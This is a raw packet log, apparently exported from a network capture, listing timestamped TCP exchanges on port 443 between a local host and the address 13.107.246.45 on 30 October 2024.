Oct 30, 2024 03:46:42.501276016 CET4434980613.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.501542091 CET4434981013.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.501944065 CET49810443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.501950979 CET4434981013.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.502397060 CET49810443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.502401114 CET4434981013.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.503817081 CET4434980713.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.504173040 CET49807443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.504196882 CET4434980713.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.504596949 CET49807443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.504605055 CET4434980713.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.630333900 CET4434980613.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.630480051 CET4434980613.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.630554914 CET49806443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.630774021 CET49806443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.630786896 CET4434980613.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.630800009 CET49806443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.630805969 CET4434980613.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.633553028 CET49811443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.633569002 CET4434981113.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.633847952 CET49811443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.634099960 CET49811443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.634111881 CET4434981113.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.636339903 CET4434981013.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.636517048 CET4434981013.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.636569023 CET49810443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.636651039 CET49810443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.636651039 CET49810443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.636657953 CET4434981013.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.636665106 CET4434981013.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.637577057 CET4434980913.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.638047934 CET4434980913.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.638207912 CET49809443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.638340950 CET49809443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.638348103 CET4434980913.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.638356924 CET49809443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.638361931 CET4434980913.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.639591932 CET4434980713.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.639697075 CET4434980713.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.639770985 CET49807443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.640068054 CET49812443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.640093088 CET4434981213.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.640408993 CET49807443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.640427113 CET4434980713.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.640444040 CET49807443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.640444040 CET49812443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.640453100 CET4434980713.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.640631914 CET49812443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.640638113 CET4434981213.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.642395973 CET49813443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.642405033 CET4434981313.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.642461061 CET49813443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.642654896 CET49813443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.642666101 CET4434981313.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.643676043 CET49814443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.643697023 CET4434981413.107.246.45192.168.2.4
Oct 30, 2024 03:46:42.643934965 CET49814443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.647595882 CET49814443192.168.2.413.107.246.45
Oct 30, 2024 03:46:42.647609949 CET4434981413.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.375343084 CET4434981413.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.375801086 CET49814443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.375813961 CET4434981413.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.376419067 CET49814443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.376424074 CET4434981413.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.384731054 CET4434981113.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.385174036 CET49811443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.385186911 CET4434981113.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.385561943 CET49811443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.385567904 CET4434981113.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.416526079 CET4434981313.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.416948080 CET49813443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.416977882 CET4434981313.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.417372942 CET49813443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.417382002 CET4434981313.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.448376894 CET4434981213.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.448858023 CET49812443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.448868036 CET4434981213.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.449270964 CET49812443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.449275970 CET4434981213.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.503937960 CET4434981413.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.503997087 CET4434981413.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.504055977 CET49814443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.504215956 CET49814443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.504240036 CET4434981413.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.504255056 CET49814443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.504264116 CET4434981413.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.507209063 CET49815443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.507234097 CET4434981513.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.507291079 CET49815443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.507438898 CET49815443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.507455111 CET4434981513.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.516386986 CET4434981113.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.516539097 CET4434981113.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.516591072 CET49811443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.516644001 CET49811443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.516654015 CET4434981113.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.516668081 CET49811443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.516671896 CET4434981113.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.519059896 CET49816443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.519089937 CET4434981613.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.519188881 CET49816443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.519366980 CET49816443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.519395113 CET4434981613.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.553479910 CET4434980813.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.553858042 CET49808443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.553875923 CET4434980813.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.554322004 CET49808443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.554327011 CET4434980813.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.554486036 CET4434981313.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.554657936 CET4434981313.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.554738045 CET49813443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.554763079 CET49813443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.554771900 CET4434981313.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.554788113 CET49813443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.554794073 CET4434981313.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.557004929 CET49817443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.557017088 CET4434981713.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.557080984 CET49817443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.557248116 CET49817443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.557260990 CET4434981713.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.582060099 CET4434981213.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.582246065 CET4434981213.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.582309961 CET49812443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.582452059 CET49812443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.582467079 CET4434981213.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.582479000 CET49812443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.582487106 CET4434981213.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.585401058 CET49818443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.585419893 CET4434981813.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.585473061 CET49818443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.585726976 CET49818443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.585736036 CET4434981813.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.687005997 CET4434980813.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.687208891 CET4434980813.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.687272072 CET49808443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.687326908 CET49808443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.687326908 CET49808443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.687344074 CET4434980813.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.687350988 CET4434980813.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.689448118 CET49819443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.689462900 CET4434981913.107.246.45192.168.2.4
Oct 30, 2024 03:46:43.689569950 CET49819443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.689939976 CET49819443192.168.2.413.107.246.45
Oct 30, 2024 03:46:43.689949989 CET4434981913.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.230799913 CET4434981513.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.231338024 CET49815443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.231364965 CET4434981513.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.231802940 CET49815443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.231810093 CET4434981513.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.248986959 CET4434981613.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.249519110 CET49816443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.249538898 CET4434981613.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.250040054 CET49816443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.250051975 CET4434981613.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.296988964 CET4434981713.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.301321983 CET49817443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.301332951 CET4434981713.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.302164078 CET49817443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.302169085 CET4434981713.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.324919939 CET4434981813.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.362978935 CET4434981513.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.363051891 CET4434981513.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.363236904 CET49815443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.365971088 CET49818443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.376666069 CET4434981613.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.376805067 CET4434981613.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.376880884 CET49816443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.425257921 CET4434981913.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.427072048 CET4434981713.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.429085016 CET4434981713.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.429167986 CET49817443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.438218117 CET49819443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.438225985 CET4434981913.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.438879967 CET49819443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.438884020 CET4434981913.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.439141989 CET49818443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.439156055 CET4434981813.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.439589977 CET49818443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.439600945 CET4434981813.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.439770937 CET49817443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.439778090 CET4434981713.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.439785957 CET49817443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.439790010 CET4434981713.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.440898895 CET49815443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.440917969 CET4434981513.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.440932035 CET49815443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.440939903 CET4434981513.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.441883087 CET49816443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.441883087 CET49816443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.441903114 CET4434981613.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.441924095 CET4434981613.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.447582960 CET49820443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.447601080 CET4434982013.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.447690964 CET49820443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.447956085 CET49820443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.447968006 CET4434982013.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.449085951 CET49821443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.449095964 CET4434982113.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.449682951 CET49821443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.450573921 CET49822443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.450583935 CET4434982213.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.450826883 CET49822443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.450998068 CET49822443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.451009035 CET4434982213.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.451462030 CET49821443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.451473951 CET4434982113.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.563719988 CET4434981913.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.563883066 CET4434981913.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.563942909 CET49819443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.564244986 CET49819443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.564249039 CET4434981913.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.564260006 CET49819443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.564264059 CET4434981913.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.566409111 CET4434981813.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.566534042 CET4434981813.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.566605091 CET49818443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.567423105 CET49823443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.567435980 CET4434982313.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.567697048 CET49823443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.567774057 CET49818443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.567774057 CET49818443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.567819118 CET4434981813.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.567845106 CET4434981813.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.574810982 CET49824443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.574856043 CET4434982413.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.575057030 CET49824443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.577052116 CET49823443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.577064991 CET4434982313.107.246.45192.168.2.4
Oct 30, 2024 03:46:44.585459948 CET49824443192.168.2.413.107.246.45
Oct 30, 2024 03:46:44.585478067 CET4434982413.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.128624916 CET49825443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.128647089 CET4434982513.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.128726006 CET49825443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.129029989 CET49825443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.129041910 CET4434982513.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.170216084 CET4434982213.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.170711040 CET49822443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.170732975 CET4434982213.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.171227932 CET49822443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.171233892 CET4434982213.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.190263987 CET4434982113.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.190639019 CET49821443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.190648079 CET4434982113.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.191030025 CET49821443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.191034079 CET4434982113.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.197926998 CET4434982013.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.198240042 CET49820443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.198251963 CET4434982013.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.198602915 CET49820443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.198609114 CET4434982013.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.298341036 CET4434982213.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.298420906 CET4434982213.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.298656940 CET49822443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.298852921 CET49822443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.298863888 CET4434982213.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.298875093 CET49822443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.298882008 CET4434982213.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.301493883 CET49826443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.301532030 CET4434982613.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.301604986 CET49826443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.301739931 CET49826443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.301753998 CET4434982613.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.312017918 CET4434982313.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.313388109 CET49823443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.313405991 CET4434982313.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.313889980 CET49823443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.313894987 CET4434982313.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.320400953 CET4434982113.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.320563078 CET4434982113.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.320631981 CET49821443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.320650101 CET49821443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.320656061 CET4434982113.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.320676088 CET49821443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.320679903 CET4434982113.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.322416067 CET4434982413.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.322875977 CET49824443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.322884083 CET4434982413.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.323261976 CET49824443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.323266983 CET4434982413.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.323385954 CET49827443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.323401928 CET4434982713.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.323470116 CET49827443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.323605061 CET49827443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.323616982 CET4434982713.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.330739021 CET4434982013.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.330935955 CET4434982013.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.330992937 CET49820443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.331038952 CET49820443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.331048965 CET4434982013.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.331058979 CET49820443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.331063986 CET4434982013.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.333111048 CET49828443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.333141088 CET4434982813.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.333352089 CET49828443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.333483934 CET49828443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.333492994 CET4434982813.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.444186926 CET4434982313.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.444233894 CET4434982313.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.444492102 CET49823443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.444642067 CET49823443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.444649935 CET4434982313.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.446816921 CET49829443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.446841002 CET4434982913.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.446901083 CET49829443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.447117090 CET49829443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.447129965 CET4434982913.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.451253891 CET4434982413.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.451493025 CET4434982413.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.451551914 CET49824443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.451610088 CET49824443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.451622009 CET4434982413.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.451632023 CET49824443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.451637030 CET4434982413.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.453561068 CET49830443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.453583956 CET4434983013.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.453824043 CET49830443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.453965902 CET49830443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.453979969 CET4434983013.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.871726036 CET4434982513.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.871793985 CET49825443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.873039961 CET49825443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.873045921 CET4434982513.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.873291016 CET4434982513.107.246.45192.168.2.4
Oct 30, 2024 03:46:45.874675989 CET49825443192.168.2.413.107.246.45
Oct 30, 2024 03:46:45.915355921 CET4434982513.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.065908909 CET4434982813.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.066010952 CET4434982713.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.066406965 CET49828443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.066420078 CET4434982813.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.066642046 CET49827443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.066664934 CET4434982713.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.066863060 CET49828443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.066868067 CET4434982813.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.067231894 CET49827443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.067238092 CET4434982713.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.076631069 CET4434982613.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.077050924 CET49826443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.077064037 CET4434982613.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.077373028 CET49826443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.077378035 CET4434982613.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.124305010 CET4434982513.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.124334097 CET4434982513.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.124353886 CET4434982513.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.124389887 CET49825443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.124397993 CET4434982513.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.124428988 CET49825443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.124464989 CET49825443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.186755896 CET4434982913.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.187235117 CET49829443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.187242985 CET4434982913.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.187705994 CET49829443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.187710047 CET4434982913.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.193449020 CET4434982813.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.193610907 CET4434982813.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.193712950 CET49828443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.193787098 CET49828443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.193800926 CET4434982813.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.193809986 CET49828443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.193814993 CET4434982813.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.195780039 CET4434982713.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.196116924 CET4434982713.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.196182966 CET49827443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.196367025 CET49827443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.196367025 CET49827443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.196374893 CET4434982713.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.196383953 CET4434982713.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.197115898 CET49831443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.197132111 CET4434983113.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.197213888 CET49831443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.197346926 CET49831443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.197352886 CET4434983113.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.198456049 CET49832443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.198510885 CET4434983213.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.198643923 CET49832443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.198770046 CET49832443192.168.2.413.107.246.45
Oct 30, 2024 03:46:46.198788881 CET4434983213.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.214582920 CET4434982613.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.214752913 CET4434982613.107.246.45192.168.2.4
Oct 30, 2024 03:46:46.214965105 CET49826443192.168.2.413.107.246.45
